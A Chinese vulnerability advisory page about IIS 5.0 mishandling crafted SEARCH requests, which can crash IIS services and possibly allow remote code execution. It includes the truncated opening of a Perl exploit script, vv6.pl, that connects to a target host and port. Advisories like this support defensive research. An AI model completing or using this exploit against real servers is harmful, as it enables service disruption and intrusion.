首页 相关文章 IIS 处理 SEARCH 请求漏洞

IIS 处理 SEARCH 请求漏洞

涉及程序:
IIS

描述:
通过构造特殊的 SEARCH 请求导致 IIS 执行攻击者代码漏洞

详细:
发现 IIS 在处理 SEARCH 请求时存在漏洞,攻击者通过提交构造特殊的 IIS SEARCH 请求能重启与 IIS 相关的所有服务,而且可能远程执行任意代码。

以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负



Details:
--vv6.pl-------------------------------------------------------------
#!/usr/bin/perl
use IO::Socket;
printf "IIS 5.0 SEARCH\nWritten by Georgi Guninski wait some time\n";
if(@ARGV < 2) { die "\nUsage: IIS5host port \n"; }
$port = @ARGV[1];
$host = @ARGV[0];
sub vv()
{
$l...[ 查看全文 ]

2016-01-29 标签:

IIS 处理 SEARCH 请求漏洞的相关文章

手机页面
收藏网站 回到头部